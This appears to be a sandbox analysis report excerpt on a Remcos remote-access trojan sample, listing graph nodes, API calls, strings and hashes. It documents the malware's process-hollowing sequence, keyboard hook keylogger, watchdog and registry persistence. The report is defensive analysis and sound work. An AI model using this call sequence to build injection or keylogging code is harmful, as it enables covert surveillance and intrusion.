404e93 SetEvent CloseHandle CloseHandle 47379->47380 47380->47376 47381->46654 47382->46654 47383->46654 47384->46654 47385->46654 47386->46712 47387->46712 47388->46712 47389->46712 47390->46712 47391->46712 47392->46712 47393->46712 47394->46712 47395->47284 47396->47291 47397->47299 47401 40513c 101 API calls 47398->47401 47400 405139 47401->47400 47402->47316 47404 41c4c6 47403->47404 47405 41ea5d 47403->47405 47406 41c4d4 47404->47406 47414 41b610 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47404->47414 47405->47310 47415 41c1f6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47406->47415 47409 41c4db 47410->47340 47411->47355 47412->47350 47413->47323 47414->47406 47415->47409 47416->47373 47418->46733 47419->46759 47420->46758 47421->46747 47422->46751 47423->46757 47425 410b83 47424->47425 47561 412268 RegCreateKeyA 47425->47561 47427 410b8a 47428 410b90 47427->47428 47429 410ba2 OpenMutexA 47427->47429 47430 410bb9 CloseHandle 47429->47430 47431 410c3e 47429->47431 47432 402073 28 API calls 47430->47432 47433 4020bf 11 API calls 47431->47433 47434 410bcf 47432->47434 47435 410c47 47433->47435 47436 402073 28 API calls 47434->47436 47439 41a20f 32 API calls 47435->47439 47437 410bdf 47436->47437 47438 4194da 79 API calls 47437->47438 47441 410be4 47438->47441 47440 410c5c 47439->47440 47442 401f66 11 API calls 47440->47442 47443 402073 28 API calls 47441->47443 47445 410c65 47442->47445 47444 410bf3 47443->47444 47446 402073 28 API calls 47444->47446 47447 419f23 GetCurrentProcess 47445->47447 47448 410bfe 47446->47448 47449 410c6a 47447->47449 47450 4194da 79 API calls 47448->47450 47451 410cc6 47449->47451 47452 410c6e 47449->47452 47453 410c03 CreateThread 47450->47453 47454 40415e 28 API calls 47451->47454 47455 40415e 28 API calls 47452->47455 47456 410c28 47453->47456 47608 411253 61 API calls 47453->47608 47457 410cd4 47454->47457 47458 410c7f 47455->47458 47459 411f34 3 API calls 47456->47459 47461 40415e 28 API 
calls 47457->47461 47462 40415e 28 API calls 47458->47462 47460 410c2f 47459->47460 47460->47428 47465 410e75 OpenProcess 47460->47465 47463 410cea 47461->47463 47464 410c95 47462->47464 47601 402f85 28 API calls 47463->47601 47600 402f85 28 API calls 47464->47600 47470 410e92 47465->47470 47468 410cf8 47471 401ef3 28 API calls 47468->47471 47469 410ca0 47472 401ef3 28 API calls 47469->47472 47603 41239a 30 API calls 47470->47603 47474 410d03 47471->47474 47475 410cab 47472->47475 47478 401ee9 11 API calls 47474->47478 47476 401ee9 11 API calls 47475->47476 47480 410cb4 47476->47480 47477 410e99 47481 410e9e 47477->47481 47479 410d0f 47478->47479 47482 401ee9 11 API calls 47479->47482 47483 401ee9 11 API calls 47480->47483 47596 410ea4 47481->47596 47485 410cbd 47482->47485 47483->47485 47487 401ee9 11 API calls 47485->47487 47488 410d21 47487->47488 47489 40415e 28 API calls 47488->47489 47490 410d38 47489->47490 47564 4112e7 47490->47564 47493 401ee9 11 API calls 47494 410d4f 47493->47494 47495 40415e 28 API calls 47494->47495 47496 410d5d 47495->47496 47497 4112e7 28 API calls 47496->47497 47498 410d6b 47497->47498 47499 401ee9 11 API calls 47498->47499 47500 410d74 47499->47500 47501 40415e 28 API calls 47500->47501 47502 410d82 47501->47502 47503 4112e7 28 API calls 47502->47503 47504 410d90 47503->47504 47505 401ee9 11 API calls 47504->47505 47517 410d99 47505->47517 47506 410de3 47507 402073 28 API calls 47506->47507 47508 410df2 47507->47508 47509 402073 28 API calls 47508->47509 47511 410e01 47509->47511 47510 401e45 22 API calls 47510->47517 47512 4194da 79 API calls 47511->47512 47513 410e06 CloseHandle 47512->47513 47602 4112e2 11 API calls 47513->47602 47516 410e1e 47518 401ee9 11 API calls 47516->47518 47517->47506 47517->47510 47519 410e3c 47517->47519 47575 41642d 47517->47575 47520 410e27 47518->47520 47521 402073 28 API calls 47519->47521 47522 401fb8 11 API calls 47520->47522 47523 410e4b 47521->47523 47524 410e30 47522->47524 47525 402073 28 API 
calls 47523->47525 47524->47428 47526 410e5a 47525->47526 47527 4194da 79 API calls 47526->47527 47528 410e5f Sleep 47527->47528 47528->47481 47531 40e1a8 47529->47531 47530 411f34 3 API calls 47530->47531 47531->47530 47533 40e24e 47531->47533 47535 40e1da 47531->47535 47536 40e23e Sleep 47531->47536 47532 408098 28 API calls 47532->47535 47534 408098 28 API calls 47533->47534 47538 40e25b 47534->47538 47535->47532 47535->47536 47544 401ee9 11 API calls 47535->47544 47547 402073 28 API calls 47535->47547 47551 41215f 14 API calls 47535->47551 47609 40bc59 111 API calls ___scrt_fastfail 47535->47609 47610 419bca 28 API calls 47535->47610 47611 412204 14 API calls 47535->47611 47536->47531 47612 419bca 28 API calls 47538->47612 47541 40e267 47613 412204 14 API calls 47541->47613 47544->47535 47545 40e27a 47546 401ee9 11 API calls 47545->47546 47548 40e286 47546->47548 47547->47535 47549 402073 28 API calls 47548->47549 47550 40e297 47549->47550 47552 41215f 14 API calls 47550->47552 47551->47535 47553 40e2aa 47552->47553 47614 4112b5 TerminateProcess WaitForSingleObject 47553->47614 47555 40e2b2 ExitProcess 47562 412280 RegSetValueExA RegCloseKey 47561->47562 47563 4122aa 47561->47563 47562->47563 47563->47427 47565 4112f4 47564->47565 47566 41135a 47565->47566 47569 411304 47565->47569 47567 411374 47566->47567 47606 4113dc 28 API calls 47566->47606 47607 411581 11 API calls 47567->47607 47573 41133c 47569->47573 47604 4113dc 28 API calls 47569->47604 47572 410d46 47572->47493 47605 411581 11 API calls 47573->47605 47576 41645a 8 API calls 47575->47576 47577 41677e 47576->47577 47578 4164c7 ___scrt_fastfail 47576->47578 47577->47517 47578->47577 47579 41652d CreateProcessW 47578->47579 47580 416563 VirtualAlloc Wow64GetThreadContext 47579->47580 47581 4167b8 GetLastError 47579->47581 47582 416591 ReadProcessMemory 47580->47582 47583 416782 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 47580->47583 47581->47577 47582->47583 47584 4165b7 
NtCreateSection 47582->47584 47583->47577 47584->47583 47585 4165df 47584->47585 47586 4165ff NtMapViewOfSection 47585->47586 47587 4165ee NtUnmapViewOfSection 47585->47587 47588 416623 VirtualFree NtClose TerminateProcess 47586->47588 47589 41666b GetCurrentProcess NtMapViewOfSection 47586->47589 47587->47586 47588->47576 47590 416666 47588->47590 47589->47583 47591 416698 _Yarn 47589->47591 47590->47577 47592 416734 WriteProcessMemory 47591->47592 47593 416757 Wow64SetThreadContext 47591->47593 47592->47583 47594 416753 47592->47594 47593->47583 47595 416770 ResumeThread 47593->47595 47594->47593 47595->47577 47595->47583 47597 410ea8 OpenProcess WaitForSingleObject CloseHandle 47596->47597 47597->47597 47598 410ed1 47597->47598 47598->47597 47599 410b5c 141 API calls 47598->47599 47599->47598 47600->47469 47601->47468 47602->47516 47603->47477 47604->47573 47605->47572 47606->47567 47607->47572 47610->47535 47611->47535 47612->47541 47613->47545 47614->47555

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                                                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                                                                  • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                                                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                                                                  • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                                                                  • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                                                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                                                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule$LibraryLoad
                                                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                                                                  • API String ID: 551388010-2474455403
                                                                                  • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                                                                  • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                                                                                  • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                                                                  • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000,?,00472200), ref: 00416474
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00416477
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection,?,00472200), ref: 00416488
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection,?,00472200), ref: 0041649C
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose,?,00472200), ref: 004164B0
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,?,?,?,00472200), ref: 00416555
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004,?,?,?,?,?,00472200), ref: 0041656D
                                                                                  • Wow64GetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,00472200), ref: 00416583
                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,?,?,?,?,?,?,00472200), ref: 004165A9
                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004165D1
                                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 004165F9
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00416619
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,00472200), ref: 0041662B
                                                                                  • NtClose.NTDLL(?), ref: 00416635
                                                                                  • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,00472200), ref: 0041663F
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040,?,?,?,?,?,00472200), ref: 0041667F
                                                                                  • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,00472200), ref: 0041668A
                                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00416749
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                                                                                  • ResumeThread.KERNELBASE(?), ref: 00416773
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,00472200), ref: 0041678A
                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00472200), ref: 00416795
                                                                                  • NtUnmapViewOfSection.NTDLL(00000000), ref: 0041679C
                                                                                  • NtClose.NTDLL(?), ref: 004167A6
                                                                                  • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,00472200), ref: 004167B0
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00472200), ref: 004167B8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                  • API String ID: 3150337530-3035715614
                                                                                  • Opcode ID: d10bf65b43118d9f3602471ab8893a8a2e2c8af733416bb1b6f525cf71852451
                                                                                  • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
                                                                                  • Opcode Fuzzy Hash: d10bf65b43118d9f3602471ab8893a8a2e2c8af733416bb1b6f525cf71852451
                                                                                  • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A

                                                                                  APIs
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                                                                                    • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00412276
                                                                                    • Part of subcall function 00412268: RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004,?,?,?,00410B8A,0046403C,00000000), ref: 00412291
                                                                                    • Part of subcall function 00412268: RegCloseKey.KERNELBASE(?,?,?,?,00410B8A,0046403C,00000000), ref: 0041229C
                                                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                                                                                  • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                  • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
                                                                                  • API String ID: 3018269243-1736093966
                                                                                  • Opcode ID: a9a082d2b9503b939e9f38d19e6741529602a6272246fb768263f7b74fab03aa
                                                                                  • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                                                                                  • Opcode Fuzzy Hash: a9a082d2b9503b939e9f38d19e6741529602a6272246fb768263f7b74fab03aa
                                                                                  • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                                                                                  • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                                                                                  • GetLastError.KERNEL32 ref: 00409375
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                                                                                  • TranslateMessage.USER32(?), ref: 004093D2
                                                                                  • DispatchMessageA.USER32(?), ref: 004093DD
                                                                                  Strings
                                                                                  • Keylogger initialization failure: error , xrefs: 00409389
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                  • String ID: Keylogger initialization failure: error
                                                                                  • API String ID: 3219506041-952744263
                                                                                  • Opcode ID: fdc0b474fe1aff0b22fd9a46203375ee37c9d39229ef2232f764eb0bd3d466e4
                                                                                  • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                                                                                  • Opcode Fuzzy Hash: fdc0b474fe1aff0b22fd9a46203375ee37c9d39229ef2232f764eb0bd3d466e4
                                                                                  • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A

                                                                                  APIs
                                                                                    • Part of subcall function 00411F34: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                                                                    • Part of subcall function 00411F34: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
                                                                                    • Part of subcall function 00411F34: RegCloseKey.KERNELBASE(?), ref: 00411F7D
                                                                                  • Sleep.KERNELBASE(00000BB8), ref: 0040E243
                                                                                  • ExitProcess.KERNEL32 ref: 0040E2B4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                  • String ID: 3.8.0 Pro$override$pth_unenc$!G
                                                                                  • API String ID: 2281282204-1386060931
                                                                                  • Opcode ID: e948d9216449ccf846751e4fdf3bee74e6ed24c53a5a704cb6257ab68b354c3b
                                                                                  • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                                                                                  • Opcode Fuzzy Hash: e948d9216449ccf846751e4fdf3bee74e6ed24c53a5a704cb6257ab68b354c3b
                                                                                  • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?), ref: 00404F61
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005130,?,00000000,00000000), ref: 00404FC0
                                                                                  Strings
                                                                                  • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Create$EventLocalThreadTime
                                                                                  • String ID: Connection KeepAlive | Enabled | Timeout:
                                                                                  • API String ID: 2532271599-507513762
                                                                                  • Opcode ID: 5d766c76dcec6d73f72b384432e0c1d874659834d306d7d3d0de572776f31551
                                                                                  • Instruction ID: 3880ceca910d84d0b9b3d3001f949c19a9d90d4f91ad2e0c59d2668d569340f7
                                                                                  • Opcode Fuzzy Hash: 5d766c76dcec6d73f72b384432e0c1d874659834d306d7d3d0de572776f31551
                                                                                  • Instruction Fuzzy Hash: 4F1127719002806AC720BB769C0DE9B7FA89BD2714F44056FF44123281D6B89445CBBA
                                                                                  APIs
                                                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,01597620), ref: 004315FE
                                                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                  • String ID:
                                                                                  • API String ID: 1815803762-0
                                                                                  • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                                                                  • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
                                                                                  • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                                                                  • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
                                                                                  APIs
                                                                                  • GetComputerNameExW.KERNELBASE(00000001,?,00000037,00471FFC), ref: 00419615
                                                                                  • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Name$ComputerUser
                                                                                  • String ID:
                                                                                  • API String ID: 4229901323-0
                                                                                  • Opcode ID: df11981a8253a9f6cfa01e36e72ce3640b108b9b137393204108e0effccf0179
                                                                                  • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
                                                                                  • Opcode Fuzzy Hash: df11981a8253a9f6cfa01e36e72ce3640b108b9b137393204108e0effccf0179
                                                                                  • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: recv
                                                                                  • String ID:
                                                                                  • API String ID: 1507349165-0
                                                                                  • Opcode ID: 3ba0adabb739ddff39a3f19a3894bbfe9ce5bc94458df24d68493e41c2bfa472
                                                                                  • Instruction ID: 0df3b2746f7319e4a339c8fc0296cb6b5099ceb5184c402daa9575d879af207d
                                                                                  • Opcode Fuzzy Hash: 3ba0adabb739ddff39a3f19a3894bbfe9ce5bc94458df24d68493e41c2bfa472
                                                                                  • Instruction Fuzzy Hash: 81B09B75105201BFC6150750CD0486E7DA597C8381B40491CB14641171C535C4505715

372->383 384 40dc99-40dcbf call 4195f8 call 401ef3 call 401ee9 372->384 373->372 383->384 406 40dcc1-40dcc2 SetProcessDEPPolicy 384->406 407 40dcc4-40dcd7 CreateThread 384->407 406->407 408 40dce5-40dcec 407->408 409 40dcd9-40dce3 CreateThread 407->409 412 40dcfa-40dd01 408->412 413 40dcee-40dcf8 CreateThread 408->413 409->408 412->137 416 40dd03-40dd06 412->416 413->412 416->188 418 40dd08-40dd0d 416->418 418->143
                                                                                  APIs
                                                                                    • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                                                                    • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                                                                    • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                                                                    • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                                                                    • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
